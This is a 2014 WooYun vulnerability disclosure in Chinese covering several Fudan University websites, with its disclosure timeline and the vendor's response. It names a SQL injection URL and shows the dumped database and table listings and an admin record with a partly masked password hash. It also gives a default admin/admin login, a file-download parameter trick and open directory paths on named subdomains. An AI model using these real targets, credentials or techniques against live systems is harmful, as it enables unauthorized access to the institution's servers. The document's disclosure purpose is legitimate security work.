当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076154

漏洞标题:复旦大学网站漏洞合集

相关厂商:复旦大学

漏洞作者: 绿枫

提交时间:2014-09-15 18:23

修复时间:2014-10-30 18:24

公开时间:2014-10-30 18:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-17: 厂商已经确认,细节仅向厂商公开
2014-09-27: 细节向核心白帽子及相关领域专家公开
2014-10-07: 细节向普通白帽子公开
2014-10-17: 细节向实习白帽子公开
2014-10-30: 细节向公众公开

简要描述:

sql注入、后台弱口令、任意下载、目录遍历各种漏洞,不管你补不补,漏洞就在那里!

详细说明:

1、sql注入:
复旦大学管理学院
注入地址:http://msc.fdsm.fudan.edu.cn/?m=course&a=see&id=127
后台地址:http://msc.fdsm.fudan.edu.cn/admin
available databases [6]:
[*] ddim
[*] ddim2
[*] information_schema
[*] mscf
[*] mysql
[*] test
以下列出几个表:
+-----------------------+
| sb_admins |
| sb_adt |
| sb_adv |
| sb_areas |
| sb_art_cates |
| sb_articles |
| sb_attachments |
| wp_usermeta |
| wp_users |
+-----------------------+
列出sb_admins表中的管理员账户密码:
select id,admin,password from sb_admins order by id [1]:
[*] 23, admin, 3fc4721c3a4ada40470xxxxxxxx6b34a
md5码我打xxx了,解密很容易,解密后登录后台就行了。
2、后台弱口令:
复旦大学纳米加工平台
地址:http://login.nanofab.fudan.edu.cn/exe/php/system/login.php
账户密码均为:admin

2.jpg


3、任意文件下载:
复旦大学社会科学高等研究院
地址:http://www.ias.fudan.edu.cn/File.aspx?filepath=ArticleUpload/20122291021141555.doc
修改下载文件地址为: filepath=File.aspx 即可直接下载File.aspx源码文件。
4、目录遍历:
复旦大学计算机科学技术学院
地址:http://www.cs.fudan.edu.cn/wp-content/uploads/

4.jpg


复旦大学电子工程系
地址:http://ee.fudan.edu.cn/electron/admin/

3.jpg


以下不贴图了。
复旦大学广播台
地址:http://radio.fudan.edu.cn/fenglin/radio/
复旦大学新闻传播学实验教学中心
地址:http://xwsys.fudan.edu.cn/cg/web/2013/
某实验室
地址:http://biotechlab.fudan.edu.cn/database/
复旦大学学生工作处
地址:http://www.stuaff.fudan.edu.cn/vote/files/2014/

漏洞证明:

如上。

修复方案:

好学校,应该有好的技术,毕竟你是复旦啊!

版权声明:转载请注明来源 绿枫@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-09-17 15:45

厂商回复:

通知处理中

最新状态:

暂无